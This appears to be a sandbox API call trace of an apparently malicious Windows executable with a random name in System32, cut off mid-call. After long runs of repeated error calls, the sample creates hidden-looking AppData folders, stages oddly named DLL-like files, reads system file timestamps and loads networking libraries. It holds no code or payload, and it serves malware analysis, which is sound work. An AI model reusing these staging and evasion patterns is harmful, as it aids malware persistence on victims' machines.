¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x18³:ô|ó\x1c", lpUsedDefaultChar=0x0) returned 256 [0035.150] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.150] GetLastError () returned 0x0 [0035.150] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.151] GetLastError () returned 0x0 [0035.151] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.152] GetLastError () returned 0x0 [0035.152] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.153] SetLastError (dwErrCode=0x0) [0035.153] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.154] GetLastError () returned 0x0 [0035.154] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.155] SetLastError (dwErrCode=0x0) [0035.155] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.156] SetLastError (dwErrCode=0x0) [0035.156] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.157] GetLastError () returned 0x0 [0035.157] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.158] GetLastError () returned 0x0 [0035.158] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.159] GetLastError () returned 0x0 [0035.159] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.160] GetLastError () returned 0x0 [0035.160] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.161] SetLastError (dwErrCode=0x0) [0035.161] GetLastError () returned 0x0 [0035.171] SetLastError (dwErrCode=0x0) [0035.171] GetLastError () returned 0x0 [0035.171] SetLastError (dwErrCode=0x0) [0035.171] GetLastError () returned 0x0 [0035.171] SetLastError (dwErrCode=0x0) [0035.171] GetLastError () returned 0x0 [0035.171] SetLastError (dwErrCode=0x0) [0035.171] GetLastError () returned 0x0 [0035.171] SetLastError (dwErrCode=0x0) [0035.171] GetLastError () returned 0x0 [0035.171] SetLastError (dwErrCode=0x0) [0035.171] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.172] SetLastError (dwErrCode=0x0) [0035.172] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.173] GetLastError () returned 0x0 [0035.173] SetLastError (dwErrCode=0x0) [0035.174] GetLastError () returned 0x0 [0035.174] SetLastError (dwErrCode=0x0) [0035.174] GetLastError () returned 0x0 [0035.174] SetLastError (dwErrCode=0x0) [0035.174] GetLastError () returned 0x0 [0035.174] SetLastError (dwErrCode=0x0) [0035.174] GetLastError () returned 0x0 [0035.174] SetLastError (dwErrCode=0x0) [0035.174] GetLastError () returned 0x0 [0035.174] SetLastError (dwErrCode=0x0) [0035.174] GetLastError () returned 0x0 [0035.174] SetLastError (dwErrCode=0x0) [0035.174] GetLastError () returned 0x0 [0035.174] SetLastError (dwErrCode=0x0) [0035.174] GetLastError () returned 0x0 [0035.174] SetLastError (dwErrCode=0x0) [0035.175] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.175] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.175] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.175] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf3c0 | out: lpSystemTimeAsFileTime=0x1cf3c0*(dwLowDateTime=0xe2a5e3b0, dwHighDateTime=0x1d3dfba)) [0035.176] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf2f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.176] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf1e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetLastError () returned 0x0 [0035.176] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.176] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.176] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.176] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.176] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.176] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.176] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.176] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.177] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.177] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.177] GetLastError () returned 0xb7 [0035.177] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.177] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.177] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.177] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.177] wsprintfA (in: param_1=0x1cf060, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.177] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.177] wsprintfA (in: param_1=0x1cef5c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.177] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.177] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.177] CloseHandle (hObject=0x74) returned 1 [0035.178] GetLastError () returned 0x0 [0035.178] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.178] GetLastError () returned 0x0 [0035.178] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.178] GetSystemDirectoryA (in: lpBuffer=0x1cf060, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.178] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.178] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.178] CloseHandle (hObject=0x74) returned 1 [0035.178] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.178] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.178] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.180] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.180] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.180] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.180] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.180] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.180] GetProcAddress (hModule=0x77510000, 